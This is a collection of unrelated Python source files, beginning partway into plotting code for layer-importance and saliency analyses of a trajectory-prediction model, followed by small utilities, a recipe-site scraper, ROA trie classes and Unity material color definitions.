                df.loc[index, model_name+'_bias'] = df_filters.loc[mask_b, f'{model_name}__{op}'].values
            df_dict[op] = df  # reused by the per-kind bar plots below
            df.plot(kind='bar', color=[colors.get(x) for x in df.columns],
                figsize=(fig_width, 4), title='Filters',
                xlabel='Layers', ylabel='Value', rot=45, legend=True)
            plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
            plt.xticks(rotation=45, ha='right')
            out_name = f'filters_{"_".join(model_dict.keys())}__{op}__bar.{format}'
            out_path = os.path.join(out_dir, out_name)
            plt.savefig(out_path, bbox_inches='tight')
            plt.close()
            print(f'Saved {out_path}')
        # barplot separately (one figure for weights, one for biases)
        for op in ['sum', 'avg']:
            df = df_dict[op]
            for name in ['weight', 'bias']:
                cols = [c for c in df.columns if c.endswith(name)]
                df[cols].plot(kind='bar', color=[colors.get(x) for x in cols],
                    figsize=(fig_width/1.7, 4), title='Filters',
                    xlabel='Layers', ylabel='Value', rot=45, legend=True)
                plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
                plt.xticks(rotation=45, ha='right')
                out_name = f'filters_{"_".join(model_dict.keys())}__{op}__bar__{name}.{format}'
                out_path = os.path.join(out_dir, out_name)
                plt.savefig(out_path, bbox_inches='tight')
                plt.close()
                print(f'Saved {out_path}')
        # plot filters' difference
        for diff_type in ['overall_relative', 'pixel_relative', 'absolute']:
            # plot
            fig, ax = plt.subplots(figsize=(fig_width, 4))
            columns = df_filters.columns[
                df_filters.columns.str.startswith('diff') & df_filters.columns.str.endswith(diff_type)]
            for column in columns:
                # column format: '<diff name>__<diff type>'
                name, _ = column.split('__')
                plt.plot(index, df_filters.loc[mask_w, column], '-', c=colors[name], label=name+'_weight')
                plt.plot(index, df_filters.loc[mask_b, column], '--', c=colors[name], label=name+'_bias')
            plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
            plt.title('Filters')
            plt.xlabel('Layers')
            plt.legend(loc='best')
            plt.xticks(rotation=45, ha='right')
            out_name = f'filters_diff_{"_".join(model_dict.keys())}__{diff_type}__plot.{format}'
            out_path = os.path.join(out_dir, out_name)
            plt.savefig(out_path, bbox_inches='tight')
            plt.close(fig)
            print(f'Saved {out_path}')
            # barplot
            df = pd.DataFrame(index=index)
            for column in columns:
                name, _ = column.split('__')
                df.loc[index, name+'_weight'] = df_filters.loc[mask_w, column].values
                df.loc[index, name+'_bias'] = df_filters.loc[mask_b, column].values
            df.plot(kind='bar', color=[colors.get(x) for x in df.columns],
                figsize=(fig_width, 4), title='Filters',
                xlabel='Layers', ylabel='Value', legend=True)
            plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
            plt.xticks(rotation=45, ha='right')
            out_name = f'filters_diff_{"_".join(model_dict.keys())}__{diff_type}__bar.{format}'
            out_path = os.path.join(out_dir, out_name)
            plt.savefig(out_path, bbox_inches='tight')
            plt.close()
            print(f'Saved {out_path}')
            # barplot separately
            for name in ['weight', 'bias']:
                cols = [c for c in df.columns if c.endswith(name)]
                df[cols].plot(kind='bar', color=[colors.get(x) for x in cols],
                    figsize=(fig_width/1.7, 4), title='Filters',
                    xlabel='Layers', ylabel='Value', rot=45, legend=True)
                plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
                plt.xticks(rotation=45, ha='right')
                out_name = f'filters_diff_{"_".join(model_dict.keys())}__{diff_type}__bar__{name}.{format}'
                out_path = os.path.join(out_dir, out_name)
                plt.savefig(out_path, bbox_inches='tight')
                plt.close()
                print(f'Saved {out_path}')
    else:
        raise ValueError('No generalization model found')
def plot_per_importance_analysis(
    tuned_name, df, n_test, scene_id, depth,
    ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
    ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
    out_dir='figures/importance_analysis', format='png', plot_err_bar=False
):
    """Bar-plot per-layer ADE/FDE importance for one tuned checkpoint.

    Args:
        tuned_name (str): Name of the tuned model ('FT' or 'ET').
        df (pd.DataFrame): Per-layer metrics with columns 'ade_diff' and
            'fde_diff' (plus '*_std' columns when plot_err_bar is True).
        n_test (int): Number of test samples (used in the output file name).
        scene_id: Scene label, or a falsy value for the scene-averaged plot.
        depth: Layer granularity; -1 plots weight/bias pairs, 1/2 plot
            grouped layer names.
        ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std:
            Overall OODG metrics (printed for reference).
        ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std:
            Overall tuned-model metrics (printed for reference).
        out_dir (str, optional): Output directory. Defaults to 'figures/importance_analysis'.
        format (str, optional): Image file format. Defaults to 'png'.
        plot_err_bar (bool, optional): Draw std error bars. Defaults to False.

    Raises:
        ValueError: if depth is not one of -1, 1, 2.
    """
    print('OODG:')
    print(f'ADE mean={round(ade_oodg_mean, 2)}, FDE mean={round(fde_oodg_mean, 2)}')
    print(f'ADE std={round(ade_oodg_std, 2)}, FDE std={round(fde_oodg_std, 2)}')
    print(tuned_name, ':')
    print(f'ADE mean={round(ade_tuned_mean, 2)}, FDE mean={round(fde_tuned_mean, 2)}')
    print(f'ADE std={round(ade_tuned_std, 2)}, FDE std={round(fde_tuned_std, 2)}')
    # Overall improvement of OODG over the tuned model; drawn as a reference line.
    tuned_diff = {
        'ade_diff': ade_oodg_mean - ade_tuned_mean,
        'fde_diff': fde_oodg_mean - fde_tuned_mean
    }
    # bar plot
    for metric in ['ade_diff', 'fde_diff']:
        fig_width = df.shape[0] * 0.25 + 3
        if depth == -1:
            # plot bias and weight with two colors
            colors = {'weight': 'tab:blue', 'bias': 'lightsteelblue'}
            mask_w = df.index.str.contains('weight')
            mask_b = df.index.str.contains('bias')
            # FIX: strip the literal '.weight' suffix. str.rstrip('.weight')
            # strips a character *set* and corrupts layer names whose stem
            # ends in any of those letters.
            index = [n[:-len('.weight')] if n.endswith('.weight') else n
                     for n in df.index[mask_w]]
            df_data = pd.DataFrame(index=index)
            df_data.loc[index, 'weight'] = df.loc[mask_w, metric].values
            df_data.loc[index, 'bias'] = df.loc[mask_b, metric].values
            if plot_err_bar:
                df_err = pd.DataFrame(index=index)
                df_err.loc[index, 'weight'] = df.loc[mask_w, metric+'_std'].values
                df_err.loc[index, 'bias'] = df.loc[mask_b, metric+'_std'].values
                df_data.plot(kind='bar', color=[colors.get(c) for c in df_data.columns],
                    figsize=(fig_width/1.7, 4), yerr=df_err, xlabel='Layers', ylabel=metric,
                    title='Importance analysis' if not scene_id else f'Importance analysis ({scene_id})')
            else:
                df_data.plot(kind='bar', color=[colors.get(c) for c in df_data.columns],
                    figsize=(fig_width/1.7, 4), xlabel='Layers', ylabel=metric,
                    title='Importance analysis' if not scene_id else f'Importance analysis ({scene_id})')
        elif (depth == 1) or (depth == 2):
            # Keep only the last component of list-like layer names
            # such as "['encoder', '0']".
            df.index = df.reset_index()['layer'].apply(
                lambda x: x.split(',')[-1] if len(x.split(','))==1 else x.split(',')[-1].lstrip(" '").rstrip("']"))
            df = df.sort_values(by='layer')
            # plot
            if plot_err_bar:
                df[[metric]].plot(kind='bar',
                    yerr=df[[metric+'_std']].rename(columns={metric+'_std': metric}),
                    figsize=(fig_width/1.3, 4), xlabel='Layers', ylabel=metric,
                    title='Importance analysis' if not scene_id else f'Importance analysis ({scene_id})')
            else:
                df[[metric]].plot(kind='bar',
                    figsize=(fig_width/1.3, 4), xlabel='Layers', ylabel=metric,
                    title='Importance analysis' if not scene_id else f'Importance analysis ({scene_id})')
        else:
            # FIX: was a plain string literal, so the offending depth value
            # never appeared in the message.
            raise ValueError(f'No support for depth={depth}')
        plt.axhline(y=tuned_diff[metric], color='tab:red',
            linestyle='--', linewidth=1, alpha=0.5, label=f'diff_OODG_{tuned_name}')
        plt.xticks(rotation=45, ha='right')
        plt.legend(loc="upper right")
        if not scene_id:
            out_name = f'{tuned_name}_{metric}__N{n_test}'
        else:
            out_name = f'{tuned_name}_{metric}__N{n_test}__{scene_id}'
        if plot_err_bar:
            out_name += '__err'
        # FIX: always append the extension; previously only the err variant
        # got one and the default case was saved without a file extension.
        out_path = os.path.join(out_dir, f'{out_name}.{format}')
        pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
        plt.savefig(out_path, bbox_inches='tight')
        plt.close()
        print(f'Saved {out_path}')
def plot_importance_analysis(
    in_dir, out_dir='figures/importance_analysis', format='png',
    n_test=500, depth=-1, plot_err_bar=False):
    """Aggregate layer-replacement result CSVs and plot importance analyses.

    Expects CSVs named 'OODG__N{n}.csv', '{tuned}__N{n}.csv' and
    '{tuned}__N{n}__{layer}.csv' inside in_dir, each with 'ade', 'fde'
    and 'sceneId' columns.

    Args:
        in_dir (str): Directory containing the result CSVs.
        out_dir (str, optional): Output directory. Defaults to 'figures/importance_analysis'.
        format (str, optional): Image file format. Defaults to 'png'.
        n_test (int, optional): Sample count encoded in file names. Defaults to 500.
        depth (int, optional): Layer granularity forwarded to
            plot_per_importance_analysis. Defaults to -1.
        plot_err_bar (bool, optional): Unused here; both variants (with and
            without error bars) are always produced. Defaults to False.
    """
    # pretrained models
    df_oodg = pd.read_csv(f'{in_dir}/OODG__N{n_test}.csv')
    ade_oodg_mean, fde_oodg_mean = df_oodg.ade.mean(), df_oodg.fde.mean()
    ade_oodg_std, fde_oodg_std = df_oodg.ade.std(), df_oodg.fde.std()
    # tuned models
    for tuned_name in ['FT', 'ET']:
        # results
        if not os.path.exists(f'{in_dir}/{tuned_name}__N{n_test}.csv'):
            continue
        df_tuned = pd.read_csv(f'{in_dir}/{tuned_name}__N{n_test}.csv')
        ade_tuned_mean, fde_tuned_mean = df_tuned.ade.mean(), df_tuned.fde.mean()
        ade_tuned_std, fde_tuned_std = df_tuned.ade.std(), df_tuned.fde.std()
        # results after replacing one layer
        df_avg, df_sample = pd.DataFrame(), pd.DataFrame()
        # collect files
        pattern = f'{in_dir}/{tuned_name}__N{n_test}__*.csv'
        file_names = glob.glob(pattern)
        if file_names:
            for file_name in file_names:
                # Layer name is the trailing '__<layer>.csv' component.
                layer_name = file_name.split('__')[-1].replace('.csv', '')
                df_file = pd.read_csv(file_name)
                df_file['layer'] = layer_name
                # Per-sample improvement of OODG over the layer-replaced model
                # (assumes identical sample order across CSVs).
                df_file.loc[:, 'ade_diff'] = df_oodg.ade - df_file.ade
                df_file.loc[:, 'fde_diff'] = df_oodg.fde - df_file.fde
                df_avg = pd.concat([df_avg, pd.DataFrame({
                    'layer': layer_name,
                    'ade_diff': df_file.ade_diff.mean(),
                    'fde_diff': df_file.fde_diff.mean(),
                    'ade_diff_std': df_file.ade_diff.std(),
                    'fde_diff_std': df_file.fde_diff.std()},
                    index=[0])], ignore_index=True, axis=0)
                df_sample = pd.concat([df_sample, df_file], ignore_index=True, axis=0)
            df_avg = df_avg.sort_values(by='layer', ascending=True)
            df_avg.set_index('layer', drop=True, inplace=True)
            # plot averaged case (once without and once with error bars)
            plot_per_importance_analysis(
                tuned_name, df_avg, n_test, None, depth,
                ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
                ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
                out_dir, plot_err_bar=False
            )
            plot_per_importance_analysis(
                tuned_name, df_avg, n_test, None, depth,
                ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
                ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
                out_dir, plot_err_bar=True
            )
            # plot by scene
            df_gb = df_sample.groupby(by=['sceneId', 'layer']).agg(['mean', 'std']).reset_index()
            df_selected = df_gb[['sceneId', 'layer']].copy()
            # Flatten the (metric, statistic) MultiIndex columns.
            df_selected.loc[:, 'ade_diff'] = df_gb['ade_diff']['mean']
            df_selected.loc[:, 'fde_diff'] = df_gb['fde_diff']['mean']
            df_selected.loc[:, 'ade_diff_std'] = df_gb['ade_diff']['std']
            df_selected.loc[:, 'fde_diff_std'] = df_gb['fde_diff']['std']
            for scene_id in df_selected.sceneId.unique():
                df_scene = df_selected[df_selected.sceneId == scene_id]
                df_scene = df_scene.sort_values(by='layer', ascending=True)
                df_scene.set_index('layer', drop=True, inplace=True)
                # TODO: legend format is incorrect
                plot_per_importance_analysis(
                    tuned_name, df_scene[['ade_diff', 'fde_diff']], n_test, scene_id, depth,
                    ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
                    ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
                    out_dir+'/scenes', plot_err_bar=False
                )
                plot_per_importance_analysis(
                    tuned_name,
                    df_scene[['ade_diff', 'fde_diff', 'ade_diff_std', 'fde_diff_std']],
                    n_test, scene_id, depth,
                    ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
                    ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
                    out_dir+'/scenes', plot_err_bar=True
                )
def plot_saliency_maps(
    input, grad_input, saliency_name, filename,
    out_dir='figures/saliency_maps', format='png',
    side_by_side=True, best_points=None):
    """Plot a saliency map for one sample, side-by-side and as an overlay.

    Args:
        input: Model input, shaped (1, C, H, W); tensor or ndarray. The first
            three channels are treated as BGR image planes.
        grad_input: Gradient w.r.t. the input, same shape; tensor or ndarray.
        saliency_name (str): Label for the saliency method (plot title).
        filename (str): Base name for output files; expected to contain
            '__<scene_id>__<meta_id>' components.
        out_dir (str, optional): Output directory. Defaults to 'figures/saliency_maps'.
        format (str, optional): Image file format. Defaults to 'png'.
        side_by_side (bool, optional): Also save a raw-image/saliency pair.
        best_points (optional): (x, y) arrays of goal points to mark with stars.
    """
    # ## plot for one sample
    scene_id, meta_id = filename.split('__')[1], filename.split('__')[2]
    _, _, height, width = input.shape
    fig, axes = plt.subplots(1, 2, figsize=(width/100*2+1, height/100))
    # format: accept both torch tensors and numpy arrays
    if torch.is_tensor(input):
        input = input.cpu().detach().numpy()
    if torch.is_tensor(grad_input):
        grad_input = grad_input.cpu().detach().numpy()
    # prepare input and switch channels (BGR -> RGB)
    blue, green, red = input[0][0], input[0][1], input[0][2]
    raw_img = np.empty((height, width, 3))
    raw_img[:, :, 0] = red
    raw_img[:, :, 1] = green
    raw_img[:, :, 2] = blue
    # min-max normalize for display
    raw_img = (raw_img - input[0].min()) / (input[0].max() - input[0].min())
    # prepare grad: collapse channels, keep positive attribution only
    grad_img = grad_input.sum(axis=(0, 1))
    grad_img[grad_img < 0] = 0
    pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
    if side_by_side:
        # plot raw image
        axes[0].imshow(raw_img)
        axes[0].set_title(f'{scene_id}: {meta_id}')
        # plot grad
        if best_points is not None:
            plt.scatter(best_points[0], best_points[1], c='r', marker='*')
        im = axes[1].imshow(grad_img, cmap='gray_r')
        axes[1].set_title(saliency_name)
        plt.colorbar(im, ax=axes.ravel().tolist(), shrink=0.9)
        # save
        # FIX: use the filename argument; the path was previously the literal
        # '(unknown)', so every call overwrote the same file.
        out_path = os.path.join(out_dir, f'{filename}.{format}')
        plt.savefig(out_path, bbox_inches='tight')
        plt.close(fig)
        print(f'Saved {out_path}')
    # plot overlay
    fig, ax = plt.subplots(1, 1, figsize=(width/100, height/100))
    ax.imshow(raw_img)
    ax.imshow(grad_img, cmap='copper', alpha=0.5)
    if best_points is not None:
        plt.scatter(best_points[0], best_points[1], c='r', marker='*')
    ax.set_title(f'{meta_id}({scene_id}): {saliency_name}')
    # save (same fix as above)
    out_path = os.path.join(out_dir, f'{filename}__overlay.{format}')
    plt.savefig(out_path, bbox_inches='tight')
    plt.close(fig)
    print(f'Saved {out_path}')
def plot_saliency_maps_side_by_side():
    """Placeholder — not implemented yet."""
    pass
if __name__ == "__main__":
    # CLI entry point: build the few-shot result plots from a directory of
    # result CSVs (create_few_shot_plot is defined elsewhere in this module).
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--results_dir", default='csv/dataset_filter/dataset_ped_biker/gap/3.25_3.75/3.25_3.75', type=str)
    parser.add_argument("--out_dir", default='figures', type=str)
    args = parser.parse_args()
    create_few_shot_plot(args.results_dir, args.out_dir)
|
# -*- coding: utf-8 -*-
import os
import errno
import logging
import time
default_logger = logging.getLogger(__name__)
class Timer(object):
    """Context manager that logs the wall-clock duration of a code block.

    Usage::

        with Timer('load data') as t:
            ...
    """

    def __init__(self, name='-', logger=None):
        # name: label used in log messages.
        # logger: destination logger; falls back to this module's default.
        self.name = name
        self.logger = logger or default_logger

    def __enter__(self):
        self.start = time.time()
        self.logger.debug("%s: started", self.name)
        # FIX: return self so `with Timer(...) as t:` binds the Timer
        # instance instead of None (backward-compatible).
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        end = time.time()
        self.logger.info("%s: done for %0.3f seconds", self.name, end - self.start)
        # Never suppress exceptions raised inside the block.
        return False
def silentremove(filename):
    """Delete *filename*, silently ignoring the case where it does not exist.

    Any other OS-level failure (permission denied, path is a directory, ...)
    is re-raised unchanged.
    """
    try:
        os.remove(filename)
    except FileNotFoundError:
        # Python 3 idiom for the old `errno == errno.ENOENT` check:
        # a missing file is the expected "already removed" case.
        pass
|
from typing import List
from urllib.request import urlopen
import altair as alt
from .chart import Chart, LayerChart
import json
def get_chart_spec_from_url(url: str) -> List[str]:
    """
    For extracting chart specs produced by the research sites framework.

    Downloads *url*, keeps only the lines containing a spec assignment
    (``"_spec = "``) and strips the first 18 characters (the assignment
    prefix) and the trailing character from each, returning raw JSON strings.
    """
    # FIX: close the HTTP response deterministically; it was previously
    # left open (resource leak).
    with urlopen(url) as response:
        content = response.read().decode().split("\n")
    content = [x[18:-1] for x in content if "_spec = " in x]
    return content
def json_to_chart(json_spec: str) -> alt.Chart:
    """
    Take a JSON spec string and produce a chart.

    Mostly needed for the weird work-arounds required when importing
    layer charts.
    """
    di = json.loads(json_spec)
    if "layer" in di:
        # Layered chart: start from an empty LayerChart, then merge each
        # layer's spec with the shared top-level keys and add it.
        layers = di["layer"]
        del di["layer"]
        del di["width"]
        chart = LayerChart.from_dict(
            {"config": di["config"], "layer": [], "datasets": di["datasets"]}
        )
        for n, l in enumerate(layers):
            # Shared top-level spec, overridden by the layer's own keys.
            di_copy = di.copy()
            di_copy.update(l)
            # Strip keys that are only valid at the top level of a spec.
            del di_copy["config"]
            del di_copy["$schema"]
            del di_copy["datasets"]
            del di_copy["width"]
            c = Chart.from_dict(di_copy)
            chart += c
    else:
        # Simple chart: drop sizing/view config before reconstruction.
        del di["width"]
        del di["config"]["view"]
        chart = Chart.from_dict(di)
    return chart
def get_chart_from_url(url: str, n: int = 0, include_df: bool = False) -> alt.Chart:
    """
    Fetch the n-th chart spec (0-indexed) from *url* and build an altair
    chart from it.

    When *include_df* is true, also recover the chart's source dataframe
    and return the pair ``(chart, df)``.
    """
    specs = get_chart_spec_from_url(url)
    chart = json_to_chart(specs[n])
    if not include_df:
        return chart
    return chart, chart.get_df()
|
from ipaddress import IPv4Network, IPv6Network
from .roa_trie import ROATrie
class IPv4ROATrie(ROATrie):
    """Trie of IPv4 CIDRs for ROAs"""

    # Network class used by the base trie to parse/validate prefixes.
    prefix_class = IPv4Network
class IPv6ROATrie(ROATrie):
    """Trie of IPv6 CIDRs for ROAs"""

    # Network class used by the base trie to parse/validate prefixes.
    prefix_class = IPv6Network
|
# Module 3 Assignment
# Amir Ahsan

# Read the stored question, prompt the user with it, and append the
# response to the same file. With 'r+' the file position is at EOF after
# read(), so write() appends after the question.
# FIX: use a `with` block so the file is closed even if input() raises.
with open("question.txt", "r+") as myfile:
    myquestion = myfile.read()
    myresponse = input(myquestion)
    myfile.write(myresponse)
|
import bs4, requests
from urllib.parse import unquote
def searchRecipe(text, page):
    """
    Scrape icook.tw search results for the given query text.

    :param text: search keyword(s) appended to the search URL
    :param page: 0 for the first results page (no query string),
        otherwise the page number passed as the ``page`` query parameter
    :return: dict with a 'recipes' list; each item holds url, name,
        description, ingredients_preview and image_url
    """
    result = {
        'recipes': []
    }
    icook_search_url = 'https://icook.tw/search/'
    if page == 0:
        url = icook_search_url + text
    else:
        url = icook_search_url + text + '?page=' + str(page)
    # A browser-like User-Agent avoids being rejected by the site.
    agent = {"User-Agent": "Mozilla/5.0"}
    request_result = requests.get(url, headers=agent)
    soup = bs4.BeautifulSoup(request_result.content, "html.parser")
    search_results = soup.find_all('li', class_='browse-recipe-item')
    for search_result in search_results:
        recipe_url = search_result.find('a', class_='browse-recipe-link').get('href')
        recipe_url = 'https://icook.tw' + recipe_url
        recipe_name = search_result.find('h2', class_='browse-recipe-name').text
        recipe_name = recipe_name.replace('\n', '').replace(' ', '')
        recipe_description = search_result.find('blockquote', class_='browse-recipe-content-description')
        # Skip entries that carry no description block.
        if recipe_description is None:
            continue
        recipe_description = recipe_description.text.replace('\n', '').replace(' ', '')
        recipe_ingredients_preview = search_result.find('p', class_='browse-recipe-content-ingredient').text
        recipe_ingredients_preview = recipe_ingredients_preview.replace('\n', '').replace(' ', '')
        recipe_image_url = search_result.find('img', class_='browse-recipe-cover-img').get('data-src')
        # The cover image is served through a proxy; the original URL is
        # percent-encoded in the 'url=' query parameter.
        recipe_image_url = recipe_image_url.split('url=')[1].split('&width')[0]
        recipe_image_url = unquote(recipe_image_url)
        # Fix: the original dict listed the 'url' key twice; the second
        # occurrence silently overwrote the first. One key is kept.
        recipe_item = {
            'url': recipe_url,
            'name': recipe_name,
            'description': recipe_description,
            'ingredients_preview': recipe_ingredients_preview,
            'image_url': recipe_image_url
        }
        result['recipes'].append(recipe_item)
    return result
from typing import List, NamedTuple, Optional
# TODO MCS-813 Use MaterialTuple throughout this file
class MaterialTuple(NamedTuple):
    """A Unity material resource paired with its descriptive color words."""
    # Unity material resource path, e.g. "Custom/Materials/Azure".
    material: str
    # Color words for the material (specific name first, then broader
    # color families — see the constants below for the pattern).
    color: List[str]
# Colors held out of training; intentionally empty for Eval 3.
UNTRAINED_COLOR_LIST = [
    # Won't be used in Eval 3
]
# Flat-color materials as (resource path, color words) tuples. The first
# color word is the specific name; any additional words are the broader
# color families it belongs to (e.g. azure -> blue).
AZURE = ("Custom/Materials/Azure", ["azure", "blue"])
BLACK = ("Custom/Materials/Black", ["black"])
BLUE = ("Custom/Materials/Blue", ["blue"])
BROWN = ("Custom/Materials/Brown", ["brown"])
CHARTREUSE = ("Custom/Materials/Chartreuse", ["chartreuse", "green"])
CYAN = ("Custom/Materials/Cyan", ["cyan", "blue", "green"])
GOLDENROD = ("Custom/Materials/Goldenrod", ["goldenrod", "yellow"])
GREEN = ("Custom/Materials/Green", ["green"])
GREY = ("Custom/Materials/Grey", ["grey"])
INDIGO = ("Custom/Materials/Indigo", ["indigo", "blue"])
LIME = ("Custom/Materials/Lime", ["lime", "green"])
MAGENTA = ("Custom/Materials/Magenta", ["magenta", "purple"])
MAROON = ("Custom/Materials/Maroon", ["maroon", "red"])
NAVY = ("Custom/Materials/Navy", ["navy", "blue"])
OLIVE = ("Custom/Materials/Olive", ["olive", "green"])
ORANGE = ("Custom/Materials/Orange", ["orange"])
PINK = ("Custom/Materials/Pink", ["pink", "red"])
RED = ("Custom/Materials/Red", ["red"])
ROSE = ("Custom/Materials/Rose", ["rose", "red"])
PURPLE = ("Custom/Materials/Purple", ["purple"])
SPRINGGREEN = ("Custom/Materials/SpringGreen", ["springgreen", "green"])
TAN = ("Custom/Materials/Tan", ["brown"])
TEAL = ("Custom/Materials/Teal", ["teal", "blue", "green"])
VIOLET = ("Custom/Materials/Violet", ["violet", "purple"])
WHITE = ("Custom/Materials/White", ["white"])
YELLOW = ("Custom/Materials/Yellow", ["yellow"])
# Only colors/materials that are exact opposites of one another.
OPPOSITE_MATERIALS = [
AZURE,
BLACK,
BLUE,
CHARTREUSE,
CYAN,
GREEN,
LIME,
MAGENTA,
MAROON,
NAVY,
OLIVE,
ORANGE,
RED,
ROSE,
PURPLE,
SPRINGGREEN,
TEAL,
VIOLET,
WHITE,
YELLOW
]
OPPOSITE_SETS = {
"Custom/Materials/Azure": ORANGE,
"Custom/Materials/Black": WHITE,
"Custom/Materials/Blue": YELLOW,
"Custom/Materials/Brown": GREY, # Not an official opposite
"Custom/Materials/Chartreuse": VIOLET,
"Custom/Materials/Cyan": RED,
"Custom/Materials/Goldenrod": INDIGO, # Not an official opposite
"Custom/Materials/Green": PURPLE,
"Custom/Materials/Grey": BROWN, # Not an official opposite
"Custom/Materials/Indigo": GOLDENROD, # Not an official opposite
"Custom/Materials/Lime": MAGENTA,
"Custom/Materials/Magenta": LIME,
"Custom/Materials/Maroon": TEAL,
"Custom/Materials/Navy": OLIVE,
"Custom/Materials/Olive": NAVY,
"Custom/Materials/Orange": AZURE,
"Custom/Materials/Purple": GREEN,
"Custom/Materials/Red": CYAN,
"Custom/Materials/Rose": SPRINGGREEN,
"Custom/Materials/SpringGreen": ROSE,
"Custom/Materials/Teal": MAROON,
"Custom/Materials/Violet": CHARTREUSE,
"Custom/Materials/White": BLACK,
"Custom/Materials/Yellow": BLUE
}
ADJACENT_SETS = {
"Custom/Materials/Azure": [BLUE[0], CYAN[0], NAVY[0], TEAL[0]],
"Custom/Materials/Black": [GREY[0]],
"Custom/Materials/Blue": [AZURE[0], INDIGO[0], NAVY[0], VIOLET[0]],
"Custom/Materials/Brown": [
GOLDENROD[0], MAROON[0], OLIVE[0], RED[0], YELLOW[0]
],
"Custom/Materials/Chartreuse": [
GOLDENROD[0], GREEN[0], LIME[0], OLIVE[0], YELLOW[0]
],
"Custom/Materials/Cyan": [AZURE[0], SPRINGGREEN[0], TEAL[0]],
"Custom/Materials/Goldenrod": [
BROWN[0], CHARTREUSE[0], OLIVE[0], ORANGE[0], YELLOW[0]
],
"Custom/Materials/Green": [CHARTREUSE[0], LIME[0], SPRINGGREEN[0]],
"Custom/Materials/Grey": [BLACK[0], WHITE[0]],
"Custom/Materials/Indigo": [BLUE[0], NAVY[0], PURPLE[0], VIOLET[0]],
"Custom/Materials/Lime": [CHARTREUSE[0], GREEN[0], SPRINGGREEN[0]],
"Custom/Materials/Magenta": [PURPLE[0], ROSE[0], VIOLET[0]],
"Custom/Materials/Maroon": [BROWN[0], ORANGE[0], RED[0], ROSE[0]],
"Custom/Materials/Navy": [AZURE[0], BLUE[0], INDIGO[0], VIOLET[0]],
"Custom/Materials/Olive": [
BROWN[0], CHARTREUSE[0], GOLDENROD[0], ORANGE[0], YELLOW[0]
],
"Custom/Materials/Orange": [
GOLDENROD[0], MAROON[0], OLIVE[0], RED[0], YELLOW[0]
],
"Custom/Materials/Purple": [INDIGO[0], MAGENTA[0], ROSE[0], VIOLET[0]],
"Custom/Materials/Red": [BROWN[0], MAROON[0], ORANGE[0], ROSE[0]],
"Custom/Materials/Rose": [MAGENTA[0], MAROON[0], PURPLE[0], RED[0]],
"Custom/Materials/SpringGreen": [CYAN[0], GREEN[0], LIME[0], TEAL[0]],
"Custom/Materials/Teal": [AZURE[0], CYAN[0], SPRINGGREEN[0]],
"Custom/Materials/Violet": [
BLUE[0], INDIGO[0], MAGENTA[0], NAVY[0], PURPLE[0]
],
"Custom/Materials/White": [GREY[0]],
"Custom/Materials/Yellow": [
BROWN[0], CHARTREUSE[0], GOLDENROD[0], OLIVE[0], ORANGE[0]
]
}
_CUSTOM_CARPET_MATERIALS = [('Custom/Materials/GreyCarpetMCS', ['grey'])] + [
(item[0] + 'CarpetMCS', item[1]) for item in OPPOSITE_MATERIALS
]
_CUSTOM_DRYWALL_MATERIALS = [('Custom/Materials/GreyDrywallMCS', ['grey'])] + [
(item[0] + 'DrywallMCS', item[1]) for item in OPPOSITE_MATERIALS
]
_CUSTOM_WOOD_MATERIALS = [('Custom/Materials/GreyWoodMCS', ['grey'])] + [
(item[0] + 'WoodMCS', item[1]) for item in OPPOSITE_MATERIALS
]
BLOCK_BLANK_MATERIALS = [
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/blue_1x1",
["blue"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/gray_1x1",
["grey"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/green_1x1",
["green"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/red_1x1",
["red"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/wood_1x1",
["brown"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/yellow_1x1",
["yellow"])
]
BLOCK_LETTER_MATERIALS = [
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_A_Blue_1K/ToyBlockBlueA",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_B_Blue_1K/ToyBlockBlueB",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_C_Blue_1K/ToyBlockBlueC",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_D_Blue_1K/ToyBlockBlueD",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_M_Blue_1K/ToyBlockBlueM",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_S_Blue_1K/ToyBlockBlueS",
["blue", "brown"])
]
BLOCK_NUMBER_MATERIALS = [
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_1_Yellow_1K/NumberBlockYellow_1",
["yellow", "brown"]),
